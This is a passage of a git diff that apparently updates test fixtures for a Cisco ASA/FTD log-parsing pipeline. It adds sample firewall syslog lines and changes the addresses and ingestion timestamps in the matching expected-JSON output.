+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:192.168.98.44/8300 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:192.168.0.124/53 (192.168.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:192.168.160.2/53 (192.168.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:192.168.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:192.168.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:192.168.98.44/8309
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:192.168.98.44/8301 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:192.168.98.44/8302 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:192.168.98.44/8303 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:192.168.98.44/8304 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:192.168.98.44/8305 duration 0:00:30
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:192.168.98.44/8306 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:192.168.98.44/8307 duration 0:00:30 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:192.168.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:192.168.98.44/8310 +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:192.168.124.24/80 (192.168.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306) +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst 
inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 
dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src 
outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] +Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] diff --git a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json index d399a8db27c..f3f42c70e51 100644 --- a/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco/data_stream/ftd/_dev/test/pipeline/test-asa.log-expected.json @@ -10,8 +10,8 @@ }, "destination": { "port": 8256, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1772, @@ -51,7 +51,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { 
@@ -59,8 +59,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094745429Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:100.66.98.44/8256", + "ingested": "2021-12-09T13:32:20.603706900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -93,8 +93,8 @@ }, "source": { "port": 80, - "address": "100.66.205.104", - "ip": "100.66.205.104" + "address": "192.168.205.104", + "ip": "192.168.205.104" }, "tags": [ "preserve_original_event" @@ -129,7 +129,7 @@ "localhost" ], "ip": [ - "100.66.205.104", + "192.168.205.104", "172.31.98.44" ] }, @@ -138,8 +138,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:06:25.094751156Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:100.66.205.104/80 (100.66.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", + "ingested": "2021-12-09T13:32:20.603715500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -155,7 +155,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.104", + "mapped_source_ip": "192.168.205.104", "connection_id": "11757", "source_interface": "outside", "mapped_destination_port": 1772 @@ -177,8 +177,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" 
@@ -213,7 +213,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -224,8 +224,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094753243Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:100.66.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603721500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -262,8 +262,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" @@ -298,7 +298,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -309,8 +309,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094755060Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:100.66.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603727400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -347,8 +347,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" 
@@ -383,7 +383,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -394,8 +394,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094756847Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:100.66.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603733100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -432,8 +432,8 @@ }, "source": { "port": 80, - "address": "100.66.185.90", - "ip": "100.66.185.90" + "address": "192.168.185.90", + "ip": "192.168.185.90" }, "tags": [ "preserve_original_event" @@ -468,7 +468,7 @@ "localhost" ], "ip": [ - "100.66.185.90", + "192.168.185.90", "172.31.98.44" ] }, @@ -479,8 +479,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094759636Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:100.66.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603738900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -517,8 +517,8 @@ }, "source": { "port": 80, - "address": "100.66.160.197", - "ip": "100.66.160.197" + "address": "192.168.160.197", + "ip": "192.168.160.197" }, "tags": [ "preserve_original_event" 
@@ -553,7 +553,7 @@ "localhost" ], "ip": [ - "100.66.160.197", + "192.168.160.197", "172.31.98.44" ] }, @@ -564,8 +564,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094761597Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:100.66.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603744600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -602,8 +602,8 @@ }, "source": { "port": 80, - "address": "100.66.205.14", - "ip": "100.66.205.14" + "address": "192.168.205.14", + "ip": "192.168.205.14" }, "tags": [ "preserve_original_event" @@ -638,7 +638,7 @@ "localhost" ], "ip": [ - "100.66.205.14", + "192.168.205.14", "172.31.98.44" ] }, @@ -649,8 +649,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094763317Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:100.66.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603750400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -687,8 +687,8 @@ }, "source": { "port": 80, - "address": "100.66.124.33", - "ip": "100.66.124.33" + "address": "192.168.124.33", + "ip": "192.168.124.33" }, "tags": [ "preserve_original_event" 
@@ -723,7 +723,7 @@ "localhost" ], "ip": [ - "100.66.124.33", + "192.168.124.33", "172.31.98.44" ] }, @@ -734,8 +734,8 @@ "severity": 6, "duration": 68000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094765076Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:100.66.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603756200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:48.000Z", @@ -772,8 +772,8 @@ }, "source": { "port": 80, - "address": "100.66.35.9", - "ip": "100.66.35.9" + "address": "192.168.35.9", + "ip": "192.168.35.9" }, "tags": [ "preserve_original_event" @@ -808,7 +808,7 @@ "localhost" ], "ip": [ - "100.66.35.9", + "192.168.35.9", "172.31.98.44" ] }, @@ -819,8 +819,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094766798Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:100.66.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603762100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -857,8 +857,8 @@ }, "source": { "port": 80, - "address": "100.66.211.242", - "ip": "100.66.211.242" + "address": "192.168.211.242", + "ip": "192.168.211.242" }, "tags": [ "preserve_original_event" 
@@ -893,7 +893,7 @@ "localhost" ], "ip": [ - "100.66.211.242", + "192.168.211.242", "172.31.98.44" ] }, @@ -904,8 +904,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094768669Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:100.66.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603767900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -942,8 +942,8 @@ }, "source": { "port": 80, - "address": "100.66.218.21", - "ip": "100.66.218.21" + "address": "192.168.218.21", + "ip": "192.168.218.21" }, "tags": [ "preserve_original_event" @@ -978,7 +978,7 @@ "localhost" ], "ip": [ - "100.66.218.21", + "192.168.218.21", "172.31.98.44" ] }, @@ -989,8 +989,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094770817Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:100.66.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603774Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1027,8 +1027,8 @@ }, "source": { "port": 80, - "address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" 
@@ -1063,7 +1063,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1074,8 +1074,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094772560Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:100.66.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603779900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1112,8 +1112,8 @@ }, "source": { "port": 80, - "address": "100.66.198.27", - "ip": "100.66.198.27" + "address": "192.168.198.27", + "ip": "192.168.198.27" }, "tags": [ "preserve_original_event" @@ -1148,7 +1148,7 @@ "localhost" ], "ip": [ - "100.66.198.27", + "192.168.198.27", "172.31.98.44" ] }, @@ -1159,8 +1159,8 @@ "severity": 6, "duration": 69000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094774295Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:100.66.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603824200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:47.000Z", @@ -1197,8 +1197,8 @@ }, "source": { "port": 80, - "address": "100.66.202.211", - "ip": "100.66.202.211" + "address": "192.168.202.211", + "ip": "192.168.202.211" }, "tags": [ "preserve_original_event" 
@@ -1233,7 +1233,7 @@ "localhost" ], "ip": [ - "100.66.202.211", + "192.168.202.211", "172.31.98.44" ] }, @@ -1244,8 +1244,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094776017Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:100.66.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603829500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1282,8 +1282,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" @@ -1318,7 +1318,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1329,8 +1329,8 @@ "severity": 6, "duration": 67000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094777782Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:100.66.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603835800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:49.000Z", @@ -1367,8 +1367,8 @@ }, "source": { "port": 80, - "address": "100.66.124.15", - "ip": "100.66.124.15" + "address": "192.168.124.15", + "ip": "192.168.124.15" }, "tags": [ "preserve_original_event" 
@@ -1403,7 +1403,7 @@ "localhost" ], "ip": [ - "100.66.124.15", + "192.168.124.15", "172.31.98.44" ] }, @@ -1414,8 +1414,8 @@ "severity": 6, "duration": 70000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094779735Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:100.66.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603839700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:46.000Z", @@ -1452,8 +1452,8 @@ }, "source": { "port": 80, - "address": "100.66.209.247", - "ip": "100.66.209.247" + "address": "192.168.209.247", + "ip": "192.168.209.247" }, "tags": [ "preserve_original_event" @@ -1488,7 +1488,7 @@ "localhost" ], "ip": [ - "100.66.209.247", + "192.168.209.247", "172.31.98.44" ] }, @@ -1499,8 +1499,8 @@ "severity": 6, "duration": 71000000000, "reason": "TCP Reset-I", - "ingested": "2021-07-19T09:06:25.094781472Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:100.66.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", + "ingested": "2021-12-09T13:32:20.603843800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I", "code": "302014", "kind": "event", "start": "2018-10-10T12:33:45.000Z", @@ -1537,8 +1537,8 @@ }, "source": { "port": 80, - "address": "100.66.35.162", - "ip": "100.66.35.162" + "address": "192.168.35.162", + "ip": "192.168.35.162" }, "tags": [ "preserve_original_event" 
